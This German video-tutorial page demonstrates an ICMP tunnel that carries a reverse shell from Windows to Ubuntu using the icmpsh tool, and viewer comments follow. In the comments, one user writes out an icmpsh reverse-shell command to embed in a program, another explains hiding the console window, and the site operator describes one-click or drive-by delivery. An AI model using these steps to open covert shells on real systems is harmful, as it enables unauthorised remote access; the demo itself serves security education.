ICMP-Tunnel (Demo)

In diesem VideoTutorial wird anhand einer Demosoftware ein sog. ICMP-Tunnel gezeigt, der eine sog. Reverse-Shell eines Windows-Rechners auf einem Ubuntu-Rechner erscheinen läßt.

Link: https://github.com/inquisb/icmpsh

SemperVideo.de

SemperVideo.de

Auf unserer Website finden Sie viele Informationen, die “Bad Guys” negativ einsetzen könnten. “Good Guys” können sich mit diesen Informationen besser schützen. Die wichtige Frage ist also, ob die “Good Guys” sicherer sind, wenn wir diese Informationen nicht verbreiten.



  • Kommentare zum Video

    Benachrichtigung
    avatar
    5000
    Sortiert nach:   neuste | älteste | beste Bewertung
    CCiTTv5
    Zuschauer

    Nett ;) Auf den letzten CCCamp hatten wir eine kleinen Wettbewerb bei dem
    sogar ein ganzen Chatprogramm über einen ICMP Tunnel programmiert wurde ;)

    LeChasseurBG
    Zuschauer

    Ich Frage mich, ob ich als “User/Angreifer” Ubuntu brauche, oder ob das
    auch mit nur 2 Windows PCs geht. Im Prinzip kann man das ja auch nutzen, um
    Internetsperren von zB der Schule oder anderen Diktatoren zu umgehen :D

    Yong Yung
    Zuschauer

    @How2Online Die parameter für “system” sind kein C++-Standard, aber das ist
    ne andere Geschichte :D (Zudem ist “system” auch eher C als C++ ;)) Nein,
    man nimmt einfach den Quellcode von genau diesem Programm (oder schreibt
    etwas gleichwertiges selbst), nur dass man die IP etc. direkt festlegt.
    Fertig ;) Damit sich die Konsole nicht öffnet muss man dem Compiler
    natürlich noch sagen, dass er das Programm als GUI Applikation kompilieren
    soll. Ist mit etwas Ahnung eigentlich alles recht simpel..

    How2Online
    Zuschauer

    @SemperVideo @SemperVideo das jeißt in C++ einfach n Programm schreiben wie
    z.B. system(“icmpsh.exe -t 192.168.1.111 -b 30 -s 128”) naja, okay. das mit
    dem -b 30 is abweichend… aber in der art würde das klappen, oder? :D

    SemperVideo
    Zuschauer

    @How2Online Das hier ist nur eine Demo der einzelnen Schritte. Das alles
    bei einem Angriff “ordentlich” verpackt würde als One-Klick-Exe daher
    kommen. Evtl. via Exploit einer anderen Schwachstelle auch nur mit aufrufen
    einer Website, dann braucht man nichtmal einen Klick.

    Egliracing1
    Zuschauer

    6 Tage noch,wollt ihr euch nicht mal Windows 7 kaufen ? xD.

    SemperVideo
    Zuschauer

    @MrGtaCrash Kein Problem, ich habs mir in den Kalender geschrieben.

    MrGtaCrash
    Zuschauer

    @SemperVideo Könnten sie in ungefähr 2 Wochen ein Video machen wie sie die
    Datei nocheinmal auf Virustotal hochladen? Würde mich sehr freuen^^

    unrealzocker
    Zuschauer

    @MeBeBonkers wir reden hier aber über icmp nicht tcp.

    MeBeBonkers
    Zuschauer

    @unrealzocker In beiden Fällen erhälst du ein TCP-RST zurück. Siehe
    Wikipedia -> TCP.

    wpDiscuz